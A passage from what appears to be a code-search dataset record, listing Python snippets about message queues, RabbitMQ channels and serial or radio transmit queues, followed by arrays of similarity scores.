'ERROR':\n self.error_queue.put(frame)\n elif frame.command == 'CONNECTED':\n self.connected_queue.put(frame)\n else:\n self.log.info(\"Ignoring frame from server: %s\" % frame)", "def single_channel():\n return True", "def __init__(self): \n self.queue = []", "def __init__(self):\n self.queue = []", "def __init__(self):\n self.queue = []", "def __init__(self):\n self.queue = []", "def __init__(self):\n self.queue = []", "def __init__(self):\n self.queue = []", "def __init__(self):\n self._queue_items = []", "def send_msg(self, my_queue, my_msg):", "def bqm_move_queue(self):\n self.bqm.turn_once()", "def dequeue(self):\n raise NotImplementedError(\"dequeue: You should have implemented this method!\")", "def __init__(self):\n self.queue = Queue()", "def setup_queue(self):\n self.logger.info('declaring queue %s', self.queue)\n if self.otq:\n self._channel.queue_declare(self.on_queue_declareok, self.queue, auto_delete=True)\n else:\n self._channel.queue_declare(self.on_queue_declareok, self.queue)", "def on_queue_declared(frame):\n start_consuming(frame)", "def on_queue_declared(self, frame):\n\t\tself.channel.basic_qos(prefetch_count=1)\n\t\tself.channel.add_on_cancel_callback(self.on_consumer_cancelled)\n\t\tself.consumer_tag = self.channel.basic_consume(\n\t\t\tself.handle_delivery, \n\t\t\tframe.method.queue\n\t\t)", "def __init__(self):\n 
self.queues=[]", "def dummyF(self, arg, signal, sender):\n \n if self.isDead == True:\n return\n \n \n #print \"DUMMY\"\n if self.aborting:\n self.aborting = False\n self.isActive = False\n self.__orderQueue.popleft()\n del self.slaveTalk\n self.slaveTalk = None\n# self.__orderQueue.popleft()\n try:\n self.releaseLock()\n except:\n pass\n #print \"No lock, actually.\" \n dispatcher.send('SLAVE_PARSE_QUEUE', self, '')", "def queueOn() -> None:\n\t\tLogging.enableQueue = Logging.queueSize > 0", "def addchan(channel):", "def handle_post_frame(self, msg):\r\n self.in_queue -= 1", "def on_exchange_declareok(self, _unused_frame):\n self._channel_ctrl.queue_declare(\n '',\n exclusive=True,\n auto_delete=True,\n callback=self.on_queue_declareok\n )", "def ceilometer_amq(self):\n connection = pika.BlockingConnection(pika.ConnectionParameters(host=self.rabbit_host,\n credentials=pika.PlainCredentials(\n username=self.rabbit_user,\n password=self.rabbit_pass)))\n channel = connection.channel()\n result = channel.queue_declare(exclusive=True)\n queue_name = result.method.queue\n channel.exchange_declare(exchange='ceilometer', type='topic')\n channel.queue_bind(exchange='ceilometer', queue=queue_name, routing_key='notifications.#')\n channel.queue_bind(exchange='ceilometer', queue=queue_name, routing_key='metering')\n\n #channel.queue_bind(exchange='ceilometer.agent.notification_fanout', queue=queue_name)\n #channel.queue_bind(exchange='ceilometer.collector_fanout', queue=queue_name)\n channel.basic_consume(self.ceilometer_callback, queue=queue_name, no_ack=True)\n channel.start_consuming()", "def whenWriteReady(self, channel, call):", "def on_queue_clear_command(self, event):\n self.pre_check(event)\n self.same_channel_check(event)\n if self.get_player(event.guild.id).queue:\n self.get_player(event.guild.id).queue.clear()\n api_loop(event.channel.send_message, \"The queue has been cleared.\")\n else:\n api_loop(event.channel.send_message, \"The queue is already empty.\")", "def ctrlqueue_push(self) -> int:\n return self.dss_obj.CtrlQueueI(ctypes.c_int32(6), ctypes.c_int32(0))", "def __init__(self) -> None:\n self._queue = []", "def vendedorBehavior(queue):\n gr = register_message()", "def get_queue(self):\n if self.queue is not None:\n return self.queue\n state = self.get_state()\n self.queue = state.get_queue()\n # print(\"IQ\", self.queue)\n return self.queue", "def _get_queue(self):\n return self.__queue", "def _get_queue(self):\n return self.__queue", "def _get_queue(self):\n return self.__queue", "def _get_queue(self):\n return self.__queue", "def _get_queue(self):\n return self.__queue", "def _get_queue(self):\n return self.__queue", "def _get_queue(self):\n return self.__queue", "def _get_queue(self):\n return self.__queue", "def _get_queue(self):\n return self.__queue", "def _get_queue(self):\n return self.__queue", "def _get_queue(self):\n return self.__queue", "def _get_queue(self):\n return self.__queue", "def _get_queue(self):\n return self.__queue", "def _get_queue(self):\n return self.__queue", "def _get_queue(self):\n return self.__queue", "def test_tx_queue_emptying(self):\n\n self._serial_handler.tx_queue.put((0,'test'))\n\n # Should write the message and then empty the queue\n self._serial_handler._write()\n\n self.assertEquals(self._serial_handler.tx_queue.qsize(), 0)", "def on_open_channel(new_channel):\n # assign new channel to the global channel variable\n global channel\n channel = new_channel\n\n # channel is assigned and declare a queue named scripbox.\n # queue Properties - 
durable is True so that the queue withstands rabbitmq reboot\n # Pass a callback on_queue_declared which fires when a queue declaration\n # is successful\n channel.queue_declare(queue='scripbox', durable=True,\n auto_delete=False, callback=on_queue_declared)", "def reset(self):\n # Because it's a queue no need for reset..\n pass", "def reset(self):\n # Because it's a queue no need for reset..\n pass", "def reset(self):\n # Because it's a queue no need for reset..\n pass", "def add_to_queue(self, msg):\n if not self.queue.full():\n self.queue.put(msg)", "def test_ipc_queues():\n IPCComm.ipc_queues()", "async def declare(self) -> 'Queue':\n # we are relying to this in other functions\n self._channel = await self._backend.channel()\n self.log.debug(\"Channel acquired CHANNEL%i\",\n self._channel.channel_number)\n\n if self.exchange:\n await self.declare_exchange()\n\n if self.name is not None:\n await self.declare_queue()\n\n if self.exchange:\n await self.bind_queue()\n\n return self", "def testQueueSend(self):\n self.mgr.queueMsg(37)\n self.assertTrue( self.mgr.msgQueue.empty() )\n self.v.send_mavlink.assert_called_with(37)", "def put(self, connection):\n with self.lock:\n try:\n if connection.state == CHECKEDOUT:\n self.queue.put(connection)\n connection.state == POOLED \n except Full:\n connection.dispose()", "def discart(self):\n self.queue.clear()\n self.fetchable = 0", "def reset_queueing(self):\n self._num_queued = 0", "def testQueueisEmpty(self):\n self.mgr.isGoproBusy = True\n self.mgr.processMsgQueue()\n self.assertFalse( self.mgr.isGoproBusy )", "def declare_queue(self):\n\n self._channel.queue_declare(queue=self._queue_name, durable=True)\n print(\"Queue declared....\")", "def __init__(self):\n self.queue = deque()", "def __init__(self):\n self.queue = deque()", "def __init__(self):\n self.queue = deque()", "def __init__(self):\n self.queue = deque()", "def run(self): \n global frame\n #acquire the semaphore\n while True:\n time.sleep(2) \n self.s1.acquire() \n self.empty.acquire()\n #remove a table from the list\n frame += 1 \n print \"Producer1(%s):deliver frame, now frame:%s\\n\" %(self.name, frame) \n self.frame.release()\n #self.threadSemaphore.release() ", "def clear(self):\n self.queue = Queue()", "def workerThread1(self):\n while self.running:\n sleep(READ_DELAY)\n\n self.gui.do_terminal() \n\n #self.queue.put(self.gui.readSerialByte) # this didn't\n #self.gui.readSerialByte() # this works", "def setup_queue(self, channel, queue_name):\n logger.info('Declaring queue %s', queue_name)\n channel.queue_declare(queue = queue_name, \n durable = True,\n auto_delete = False)", "def testQueueFlushQueue(self):\n self.mgr.sendState = Mock()\n self.mgr.isGoproBusy = True\n self.mgr.lastRequestSent = monotonic.monotonic()\n self.mgr.queueMsg(1)\n self.mgr.queueMsg(2)\n self.assertEqual(self.mgr.msgQueue.qsize(), 2)\n self.mgr.lastRequestSent = monotonic.monotonic() - 3.0\n self.mgr.queueMsg(3)\n self.assertTrue(self.mgr.msgQueue.empty)\n self.mgr.sendState.assert_called_with()", "def channel(self, channel: int, /) -> \"TimerChannel\" | None:", "def __attrs_post_init__(self):\n self.state_changes_send_channel, self.state_changes_receive_channel = trio.open_memory_channel(\n math.inf\n )\n self._nursery = self._nursery_manager = None", "def __init__(self):\n self.dequeue = DeQueue()", "def on_shutdown(self):\n while self._queue:\n self._get()", "def __init__(self):\n Queue.__init__(self)", "def __init__(self):\n self.data = Queue()", "def setup_queue(self, method_frame):\n 
logger.info('Declaring queue %s', self.queue_name)\n # self._channel.queue_declare(self.on_queue_declareok, queue_name)\n\n self._channel.queue_declare(self.on_queue_declareok, exclusive=False, durable=True, queue=self.queue_name)", "def process_queued_msg(self):\n try:\n while not self.queue.empty():\n port, tbl = self.queue.get()\n reveived_port = self.switches[port.neighbor_switch_dpid].ports[port.neighbor_port_no]\n self.tbl.update_by_neighbor(reveived_port, port, tbl)\n self.deploy_routing_table()\n except:\n pass", "def fill_rawq(self):\n # The buffer size should be fairly small so as to avoid quadratic\n # behavior in process_rawq() above\n\n buf = self.channel.recv(50)\n self.msg(\"recv %r\", buf)\n self.eof = (not buf)\n self.rawq = self.rawq + buf", "def __producer__(self):\n import time\n i = 0\n while True:\n self.publish( i )\n i += 1\n time.sleep(1)", "def radioLoop(self, grid):\n commandInQueue = [0 , 0 , 0 , 0 , 0 , 0]\n q = Queue.Queue()\n while(1):\n # temp\n receivePipeNum = [-1]\n dataRx = []\n if self.radio.available(receivePipeNum):\n self.radio.read(dataRx, self.radio.getDynamicPayloadSize())\n string = \"\"\n print(\"Pipe Number: {}\".format(receivePipeNum))\n # for n in dataRx:\n # # Decode into standard unicode set\n # if (n >= 32 and n <= 126):\n # string += chr(n)\n # print(\"Out received message decodes to: {}\".format(string))\n print(\"Received: {}\".format(dataRx))\n statusByte = dataRx[9]\n print(\"status byte: {}\".format(dataRx[9]))\n# self.radio.print_status(self.radio.get_status())\n# ackPayload = [0x46 , 0x75 , 0x63 , 0x6B , 0x59 , 0x65 , 0x73]\n# self.radio.writeAckPayload(receivePipeNum[0] , ackPayload , 7)\n# self.radio.print_status(self.radio.get_status())\n\n \"\"\"\n add new bot: dataRx[0] & 0x1\n target found: dataRx[0] & 0x2\n requesting data: dataRx[0] & 0x4\n \"\"\"\n # Adding bot (addbot = 1)\n if statusByte & 0x01:\n # TODO(add exploregrid logic)\n # TODO: add in adding bot logic\n # self.addBot(grid, bot)\n print(\"adding bot {}\".format(receivePipeNum[0]))\n commandInQueue[receivePipeNum[0]] = 0\n\n # move request from a bot\n elif statusByte & 0x04:\n if commandInQueue[receivePipeNum[0]] == 0:\n #ack[0] = (0x80 + previousMoves[receivePipeNum[0]])\n #self.radio.writeAckPayload(receivePipeNum[0] , ack , 1)\n #previousMoves[receivePipeNum[0]] = previousMoves[receivePipeNum[0]] + 1\n command = []\n command.append(receivePipeNum[0])\n command.append(self.getBotCommand())\n q.put(command)\n #if not self.isTXQueueFull():\n # self.radio.writeAckPayload(receivePipeNum[0] , command , 1)\n\n\n commandInQueue[receivePipeNum[0]] = 1\n else:\n print(\"command for pipe {} already given\".format(receivePipeNum[0]))\n\n # Not requesting data (req = 0) update sensors\n\n elif statusByte & 0x08:\n # TODO: Add logic to check to see if the move failed\n self.sensors = [dataRx[0], dataRx[1],\n dataRx[2], dataRx[3],\n dataRx[4], dataRx[5],\n dataRx[6], dataRx[7],\n dataRx[8], receivePipeNum[0] + 1,\n statusByte]\n \"\"\"self.sensors = [ord(dataRx[0]), ord(dataRx[1]),\n ord(dataRx[2]), ord(dataRx[3]),\n ord(dataRx[4]), ord(dataRx[5]),\n ord(dataRx[6]), ord(dataRx[7]),\n ord(dataRx[8])]\n \"\"\"\n # Sent a data command, so the previous payload must have been received\n commandInQueue[receivePipeNum[0]] = 0\n print(self.sensors)\n\n # target found bit\n if statusByte & 0x02:\n self.targetFound = True\n print(\"TARGET FOUND\")\n\n if not self.isTXQueueFull():\n #q.empty():\n if not q.empty():\n print(commandInQueue)\n print(\"adding to queue\")\n ack = q.get()\n 
print(\"ACK {}\".format(ack))\n self.radio.writeAckPayload(ack[0] , ack[1:] , 1)\n time.sleep(.1)\n else:\n print(\"queue\")\n # TODO(add direction computation logic)\n else:\n print(\"fifo full\")\n print(\"\")\n\n\n \"\"\"\n unsure if necessary... clears pipes... add if necessary\n self.radio.stopListening()\n \"\"\"\n\n \"\"\"\n unsure if necessary... additional computation may be enough of\n delay... add if neccessary\n \"\"\"\n time.sleep(.1)", "def whenReadReady(self, channel, call):", "def send(self,msg):\n try:\n if self.mutexCmd.tryLock(100):\n self.cmd.append(msg)\n self.mutexCmd.unlock()\n #print(\"ADD TO QUEUE: {}\".format(msg))\n else:\n print(\"WARN: cmd not added to queue\")\n except Exception as e:\n print(\"ERROR:Serial:send:\",e)\n self.ConnexionError.emit(True)", "def subscribe(self, queue, action):\n self.channel.queue_declare(queue=queue)\n self.channel.basic_consume(queue=queue,\n on_message_callback=action,\n auto_ack=True)\n self.channel.start_consuming()", "def channel(self):\n\n self._channel = self._connection.channel()\n print(\"Channel opened...\")", "def tryToSend( self, message ):\n if self.free:\n self.free = False\n yield self.writeToSerial( message )\n elif len( self.queue ) > MAX_QUEUE_SIZE:\n raise Exception( 'Queue size exceeded')\n else: self.queue.append( message )" ]
[ "0.65623856", "0.6367049", "0.6290647", "0.62499535", "0.6225105", "0.6223285", "0.6223285", "0.61602104", "0.6132086", "0.61052483", "0.60849404", "0.60789603", "0.60609317", "0.6031437", "0.6011403", "0.59847355", "0.59847355", "0.59652287", "0.5922787", "0.59155333", "0.59132123", "0.58973587", "0.58973587", "0.58973587", "0.58973587", "0.58973587", "0.5892758", "0.5877724", "0.5872582", "0.58527017", "0.582323", "0.5822851", "0.5817696", "0.5814028", "0.58113426", "0.58042383", "0.5797605", "0.5767027", "0.5763322", "0.57617176", "0.57595634", "0.57563555", "0.57454425", "0.5738453", "0.57377297", "0.57184035", "0.571146", "0.5691053", "0.5691053", "0.5691053", "0.5691053", "0.5691053", "0.5691053", "0.5691053", "0.5691053", "0.5691053", "0.5691053", "0.5691053", "0.5691053", "0.5691053", "0.5691053", "0.5691053", "0.56899905", "0.56854194", "0.5665574", "0.5665574", "0.5665574", "0.56653494", "0.56421125", "0.5634902", "0.56341064", "0.56307125", "0.5621557", "0.5607545", "0.5603811", "0.560106", "0.5584715", "0.5584715", "0.5584715", "0.5584715", "0.55810493", "0.5570548", "0.5561497", "0.5559993", "0.5556218", "0.55490077", "0.5548892", "0.55318165", "0.5519555", "0.5516649", "0.5512671", "0.5510111", "0.5492797", "0.54852295", "0.5484013", "0.5483667", "0.5476943", "0.547472", "0.54721224", "0.54621166", "0.5458602" ]
0.0
-1
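The two channel records here describe a small simulated-medium API: a Channel that keeps no queue (queueing is the phy/mac's job), holds a list of attached phys, and, shortly after attach, delivers a BusyIndication or IdleIndication SDU to the new phy. The sketch below is a reconstruction from those query/document fragments only; the receive() callback name, the default delay value, and the internal _busy flag are assumptions not present in the dataset.

import threading

# Minimal stand-ins for the SDU types named in the queries; their real
# definitions are not shown here, so these are placeholders.
class IdleIndication: pass
class BusyIndication: pass

_default_layer_delay = 0.001  # seconds -- assumed; the source only references the name

class Channel:
    """Simulated shared medium: keeps no queue, that is the phy/mac's job."""

    def __init__(self, layer_delay=_default_layer_delay):
        self._attached_phys = []      # phys currently listening on the channel
        self._layer_delay = layer_delay
        self._busy = False            # assumed internal state; not shown in the source

    def attach(self, phy_layer):
        # Register the phy and, after a short delay, tell it the medium state.
        self._attached_phys.append(phy_layer)
        sdu = BusyIndication() if self._busy else IdleIndication()
        # phy_layer.receive(...) is an assumed callback name.
        threading.Timer(self._layer_delay, phy_layer.receive, args=(sdu,)).start()

    def detach(self, phy_layer):
        self._attached_phys.remove(phy_layer)

A phy stub only needs a receive(sdu) method to exercise this sketch.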
Attach the given phy layer to the channel. After a short delay, the phy_layer should receive a `BusyIndication` or `IdleIndication` SDU
def attach(self, phy_layer):
    self._attached_phys.append(phy_layer)
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def __init__(self, layer_delay=_default_layer_delay):\n self._attached_phys = []\n self._layer_delay = layer_delay", "def add_layer(self, layer: Union[CommandLayer, Type[CommandLayer]],\n active: Optional[bool] = True):\n if issubclass(layer, CommandLayer):\n layer = layer.load(self.character)\n if active or not any(l.active for l in self.command_layers):\n layer.active = True\n for other in self.command_layers:\n other.active = False\n\n self.command_layers.insert(0, layer)\n self._save()", "def wifi_on(self):\n self._clear_read_buffer()\n self._write_cmd(\"PE01\")\n time.sleep(100e-3)", "def connect(self):\n\n # Send some bogus UART characters to force a sleeping device to wake\n self._writeBytes(bytes([START1, START1, START1, START1]))\n time.sleep(0.1) # wait 100ms to give device time to start running\n\n self._rxThread.start()\n if not self.noProto: # Wait for the db download if using the protocol\n self._waitConnected()", "def on(self, include_ethernet=False):\n if not self.healthy:\n self.health_check()\n self._hub.switch_power.power_on(self.port_number)\n if self.secondary_port_number is not None:\n self._hub.switch_power.power_on(self.secondary_port_number)\n if include_ethernet:\n self.ethernet_on()\n time.sleep(5) # Small delay to give time for 'dev/tty' to populate\n switchboard = self._get_switchboard_if_initialized()\n if switchboard:\n switchboard.open_all_transports()", "def cycle(self, include_ethernet=False):\n if not self.healthy:\n self.health_check()\n self.off()\n time.sleep(2) # Small delay before calling power_on\n self.on()", "def connect_ap(self):\n\n # scan passively now that the AP has started\n self.host.scan_passive(200)\n \n # connect to AP\n self.host.sta_connect(self.ap1.macaddr)\n\n # expect a management frame for the AP\n mpdu = self.ap1.rx_mpdu(wifi.AIR_MGMT)\n \n # sanity checks\n assert(mpdu.typesubtype == wifi.fctl_probereq)\n assert(wifi.find_ie(mpdu.typesubtype, mpdu.bd, wifi.ie_ssid) == \"louis\")\n \n # send a probe response (optional if the join timeout is long enough)\n \n # expect an authentication request\n mpdu = self.ap1.rx_mpdu(wifi.AIR_MGMT)\n \n # sanity checks\n assert(mpdu.typesubtype == wifi.fctl_authentication)\n \n # send an authenticate response\n self.ap1.tx_msdu(da=self.host.macaddr, body=wifi.authenticate(), \n fctl=wifi.fctl_authentication)\n\n # expect an association request\n mpdu = self.ap1.rx_mpdu(wifi.AIR_MGMT)\n # sanity checks\n assert(mpdu.typesubtype == wifi.fctl_associationreq)\n \n # send an association response\n self.ap1.tx_msdu(da=self.host.macaddr, body=wifi.associationresponse(), \n fctl=wifi.fctl_associationresp)\n \n # expect a STA connection confirmation with a correct status\n assert(self.host.sta_connect_confirm() == True)", "def ethernet_on(self):\n if not self.healthy:\n self.health_check()\n if not self._ethernet_switch:\n raise errors.CapabilityNotReadyError(\n device_name=self._device_name,\n msg=\"Not set up for ethernet switching.\")\n self._ethernet_switch.switch_power.power_on(self.ethernet_port_number)", "def transmit(self) -> None:\n # Like RadioHead library, turn on high power boost if enabled.\n self.set_boost(_TEST_PA1_BOOST)\n # Enable packet sent interrupt for D0 line.\n self.dio_0_mapping = 0b00\n # Enter TX mode (will clear FIFO!).\n self.operation_mode = TX_MODE", "def add_layer(self, layer):\n self.__layers.append(layer)", "def set_next_layer(self, layer):\n self._next_layer = layer", "def add_layer(self, layer):\n idx = len(self.dict_topo)\n idx += 1\n self.dict_topo[idx] = layer", 
"def add(self, layer):\n self._top = layer(self._top)\n layer_name_ = layer.__class__.__name__\n layer_params_ = layer.params\n self._info.append((layer_name_, layer_params_))", "def init_wlan_sta():\n\n print('WLAN: STA mode')\n wlan.init(mode=WLAN.STA)\n if not wlan.isconnected():\n wlan.connect(WLAN_SSID, auth=WLAN_AUTH, timeout=5000)\n while not wlan.isconnected():\n machine.idle() # save power while waiting", "def layer(self, layer):\n self._layer = layer", "def switch_on(self, boot_timeout=None, settledown_duration=None,\n simple_switch_mode=False):\n raise DeviceException(DeviceException.FEATURE_NOT_IMPLEMENTED)", "def addLayer(self, layer):\n self.layers.append(layer)", "def setAdhocParameters(self, host, mode, **params):\n self.mode = mode\n latency = 10\n self.host = host\n #delay = 5 * distance\n try:\n options = dict( params )\n self.interface = options[ 'interface' ]\n except: \n self.interface = 'wlan0'\n \n bandwidth = wifiParameters.set_bw(mode)\n #self.host.cmd(host, \"tc qdisc replace dev %s-%s root netem rate %.2fmbit latency %.2fms delay %.2fms\" % (host, self.interface, rate, latency, delay)) \n self.host.cmd(\"tc qdisc add dev %s-%s root tbf rate %smbit latency %sms burst 1540\" % (str(host), self.interface, bandwidth, latency))", "def add_layer(self, layer: layers.Layer) -> layers.Layer:\n layer.events.select.connect(self._update_active_layer)\n layer.events.deselect.connect(self._update_active_layer)\n layer.events.status.connect(self._update_status)\n layer.events.help.connect(self._update_help)\n layer.events.interactive.connect(self._update_interactive)\n layer.events.cursor.connect(self._update_cursor)\n layer.events.cursor_size.connect(self._update_cursor_size)\n layer.events.data.connect(self._on_layers_change)\n layer.dims.events.ndisplay.connect(self._on_layers_change)\n layer.dims.events.order.connect(self._on_layers_change)\n layer.dims.events.range.connect(self._on_layers_change)\n self.layers.append(layer)\n self._update_layers(layers=[layer])\n\n if len(self.layers) == 1:\n self.reset_view()\n return layer", "def connect(self):\n self.sta_if = network.WLAN(network.STA_IF)\n self.sta_if.active(False)\n sleep(1)\n self.sta_if.active(True)\n\n dbg(\"Interface active\")\n if self.check_ap(self.ssid):\n # connect to access point\n if not self.sta_if.isconnected():\n dbg('connecting to AP...')\n self.sta_if.active(True)\n self.sta_if.connect(self.ssid, self.key)\n while not self.sta_if.isconnected():\n machine.idle()\n # Do we need a timeout here?\n dbg(self.sta_if.ifconfig())\n else:\n dbg(\"WLAN already connected\")\n dbg(self.sta_if.ifconfig())\n else:\n dbg(\"Target SSID not found.\")\n reset(\"Could not connect to network - target SSID is not availble.\", HARD)", "def feed(self, instruction):\n assert self.future_inst is None, 'BranchUnit fed when full'\n self.future_inst = instruction\n self.future_timer = max(0, instruction.DELAY - 1)", "def add_layer(self, layer):\n\n self._layers.append(layer)", "def setPhyDataTransmission(self, modeName, serviceName):\n self.phyDataTransmission[modeName] = serviceName", "def setPhyDataTransmission(self, modeName, serviceName):\n self.phyDataTransmission[modeName] = serviceName", "def connect(self):\n if self._btleSubThread is not None and threading.current_thread().ident != self._btleSubThread.ident:\n return # not allow\n self._peripheral.connect(self.car_mac, btle.ADDR_TYPE_RANDOM)\n self._readChar = self._peripheral.getCharacteristics(1, 0xFFFF, \"be15bee06186407e83810bd89c4d8df4\")[0]\n self._writeChar = 
self._peripheral.getCharacteristics(1, 0xFFFF, \"be15bee16186407e83810bd89c4d8df4\")[0]\n self._delegate.setHandle(self._readChar.getHandle())\n self._peripheral.setDelegate(self._delegate)\n self.turnOnSdkMode()\n self.enableNotify()\n self._connected = True\n self._reconnect = False\n if self._btleSubThread is None:\n self._transferExecution()", "def init_wlan_ap():\n\n print('WLAN: AP mode')\n wlan.init(mode=WLAN.AP,\n ssid='ttn-be-mapper',\n auth=(WLAN.WPA2, 'reppam-eb-ntt'),\n channel=7,\n antenna=WLAN.INT_ANT)", "def connectAdapter(self):\n self.canusb = pycanusb.CanUSB(bitrate='500')\n print('CanUSB: ',self.canusb)\n Msg = Switch_to_Operational_State_Msg()\n QTimer.singleShot(50,lambda msg = Msg : self.initialization(Msg))", "def enqueue(fun, timeout=200):\n\n GLib.idle_add(fun)", "def append(self, layer):\n self.layers.append(layer)", "def append_layer(self, *args, **kwargs) :\n \n self.insert_layer(len(self._layers), *args, **kwargs)", "def detach(self, phy_layer):\n self._attached_phys.remove(phy_layer)", "def tx_packet(self, packet):\r\n self.tx_cmd(packet.fctype, packet.nto, packet.narg1, packet.narg2, packet.smessage)", "def port_nic_add(switch, port, node, nic):\n client.port.connect_nic(switch, port, node, nic)", "def attach_yombo_device(self, yombo_device):\n logger.info(\"Attach yombo device to me.. {label}\", label=yombo_device.full_label)\n self.yombo_device = yombo_device\n self.yombo_device.wemo_device = self\n self.FEATURES = self.yombo_device.FEATURES\n self.update_value(self.state)", "def enable(self):\n self.fisica.open()\n self.rx.threadStart()\n self.tx.threadStart()", "def rx_beacon_packet(self): \n self.beacon.make_packet()\n rx_packet = self.beacon.tx_packet()\n rx_time = np.float128('%.20f'%(time.time()))\n if self.DEBUG:\n print 'rx_time: ', repr(rx_time)\n\n self.data.set_timestamp_base(rx_time)\n self.data.set_beacon_packet(rx_packet)", "def init_layer(layer, nonlinearity='leaky_relu'):\n nn.init.kaiming_uniform_(layer.weight, nonlinearity=nonlinearity)\n\n if hasattr(layer, 'bias'):\n if layer.bias is not None:\n layer.bias.data.fill_(0.)", "def associate(self, sta, ssid): \n self.host = sta\n self.host.cmd(\"iw dev %s-wlan0 connect %s\" % (sta, ssid))\n self.confirmInfraAssociation(self.host)", "def Set_Meas_Additional(self, mode, state, ch=1):\n self.write(f':MEAS{ch}:ADD {mode} {state}')", "def send_at_command(self, at_command, timeout, com_port):\n raise DeviceException(DeviceException.FEATURE_NOT_IMPLEMENTED)", "def tx_switch_channel(self,earfcn,bwMhz,powerdBm,ud_config=None,iterations=4,with_rx=False):\r\r\n\r\r\n self.meas_list = ['EVM']\r\r\n if earfcn >= 36000:\r\r\n self.setup_tdd(earfcn,bwMhz,powerdBm,ud_config,with_rx=with_rx)\r\r\n else:\r\r\n assert(ud_config is None)\r\r\n self.setup_fdd(earfcn,bwMhz,powerdBm,with_rx)\r\r\n\r\r\n tol_dB = 1\r\r\n\r\r\n earfcn_list = [earfcn, earfcn + 100] * iterations\r\r\n for current_earfcn in earfcn_list:\r\r\n _,freq_ul,freq_dl = lte_util.get_lte_ul_dl_freq_band(current_earfcn)\r\r\n self.modemObj.set_freqMHz(freqMHz=freq_ul)\r\r\n if with_rx:\r\r\n self.modemObj.set_freqMHz(direction='rx',freqMHz=freq_dl)\r\r\n\r\r\n self.instr.lte_tx.set_rf_freqMHz(freqMHz=freq_ul)\r\r\n\r\r\n self.GetTesterMeasurments(exp_powerdBm=powerdBm,\r\r\n tol_dB=tol_dB)", "def putLayer(self, layer):\t\n\t\t# force use different address id ( prevent use same defined layer more than once, eg: bottleneck in torchvision)\n\t\t# tmp_layer = copy.deepcopy(layer)\n\t\tlayer_id = 
id(layer)\n\t\tself.tmp_list.append(layer)\n\t\tlayer_id = id(self.tmp_list[-1])\n\t\tif layer_id in self.graph:\n\t\t\ttmp_layer = copy.deepcopy(layer)\n\t\t\tself.tmp_list.append(tmp_layer)\n\t\t\t# layer_id = id(self.tmp_list[-1])\n\t\t\tlayer_id = id(tmp_layer)\n\n\t\tself.graph[layer_id] = layer\n\t\tself.bottoms[layer_id] = [self.cur_id]\n\t\tself.cur_id = layer_id\n\t\t# del layer, tmp_layer, layer_id", "def activate():\n refresh()\n activate_connection_with_mainloop(get_uuid())", "def add_layer(self, layer):\n assert isinstance(layer, torch.nn.Module)\n setattr(self, 'layer'+str(self._layer_counter), layer)\n self._layer_counter += 1\n # layer indexing : layer 0 is closest to input", "def test_gatt_connect_in_quick_succession(self):\n gatt_server_cb = self.per_ad.droid.gattServerCreateGattServerCallback()\n gatt_server = self.per_ad.droid.gattServerOpenGattServer(\n gatt_server_cb)\n self.gatt_server_list.append(gatt_server)\n mac_address, adv_callback = get_mac_address_of_generic_advertisement(\n self.cen_ad, self.per_ad)\n autoconnect = False\n for i in range(1000):\n self.log.info(\"Starting connection iteration {}\".format(i + 1))\n try:\n bluetooth_gatt, gatt_callback = setup_gatt_connection(\n self.cen_ad, mac_address, autoconnect)\n except GattTestUtilsError as err:\n self.log.error(err)\n return False\n test_result = self._orchestrate_gatt_disconnection(bluetooth_gatt,\n gatt_callback)\n if not test_result:\n self.log.info(\"Failed to disconnect from peripheral device.\")\n return False\n self.adv_instances.append(adv_callback)\n return True", "def enable_dcbx_tlv_transmission(self, ports, dcbx_tlvs=\"all\", mode=\"Enabled\"):\n pass", "def _set_up_phy_for_capture(self, usb_speed):\n\n # Set up our ULPI PHY's core functionality: set it powered on, in non-driving mode\n # (so we can snoop), and set the relevant speed.\n self.ulpi_regs.FUNC_CTL = \\\n int(usb_speed) | self.ulpi_regs.FuncCTLFlags.OPERATING_MODE_NON_DRIVING \\\n | self.ulpi_regs.FuncCTLFlags.PHY_POWERED", "def register_layer(key, module):\n register(key, module, layer_dict)", "def simulateNetworkLayer(self, tick):\n if tick == self.mNextTickForPacket:\n f = Frame(self.mPacketSize, tick, self.mPosition)\n self.mMessageQueue.append(f)\n self.mNextTickForPacket = tick + self.delayToNextPacket()", "def setInfraParameters(self, sta, mode, distance):\n station.mode(str(sta), mode)\n \n seconds = 3\n self.src = str(sta)\n try:\n \"\"\"Based on RandomPropagationDelayModel (ns3)\"\"\"\n seconds = abs(mobility.speed[self.src])\n except:\n pass\n self.host = sta\n latency = wifiParameters.latency(distance)\n loss = wifiParameters.loss(distance)\n delay = wifiParameters.delay(distance, seconds)\n bw = wifiParameters.bw(distance, mode) \n self.host.pexec(\"tc qdisc replace dev %s-wlan0 root netem rate %.2fmbit loss %.1f%% latency %.2fms delay %.2fms\" % (sta, bw, loss, latency, delay)) \n #os.system('util/m %s tc qdisc replace dev %s-wlan0 root netem rate %.2fmbit latency %.2fms delay %.2fms' % (self.host, self.host, bandwidth, latency, delay))\n #self.host.cmd(\"tc qdisc replace dev %s-wlan0 root tbf rate %.2fmbit latency %.2fms burst 15k\" % (self.host, rate, latency)) \n associate = self.doAssociation(mode, distance)\n if associate == False:\n mobility.handover(self.host)", "def write_am(self, packet, amid, seqno, timeout=2.0):\n\n # Convert from app-specific packet to ActiveMessage:\n p = ActiveMessage(packet, amid=amid)\n\n # Write to the serial device\n self.write(p, seqno, timeout)", "def 
createIdlePacket(packetByteSize=PACKET_MIN_BYTE_SIZE):\n # the idle packet is a TM packet without a secondary header (CCSDS)\n # and zeros in the data field and 0 in the sequence counter\n minimumSize = PACKET_MIN_BYTE_SIZE\n if packetByteSize < PACKET_MIN_BYTE_SIZE:\n raise ValueError(\"binary size too small, must be >= \" + str(PACKET_MIN_BYTE_SIZE))\n binaryString = \"\\0\" * packetByteSize\n idlePacket = CCSDS.PACKET.TMpacket(binaryString)\n idlePacket.packetType = CCSDS.PACKET.TM_PACKET_TYPE\n idlePacket.setPacketLength()\n idlePacket.versionNumber = 0\n idlePacket.dataFieldHeaderFlag = 0\n idlePacket.segmentationFlags = CCSDS.PACKET.UNSEGMENTED\n idlePacket.applicationProcessId = CCSDS.PACKET.IDLE_PKT_APID\n idlePacket.sequenceControlCount = 0\n return idlePacket", "def tx_switch_band(self,band1,band2,bwMhz,powerdBm,ud_config=None):\r\r\n self.meas_list = ['EVM']\r\r\n tol_dB = 1\r\r\n\r\r\n earfcn1 = lte_util.ul_Default_EARFCN(band1)\r\r\n\r\r\n if earfcn1 >= 36000:\r\r\n 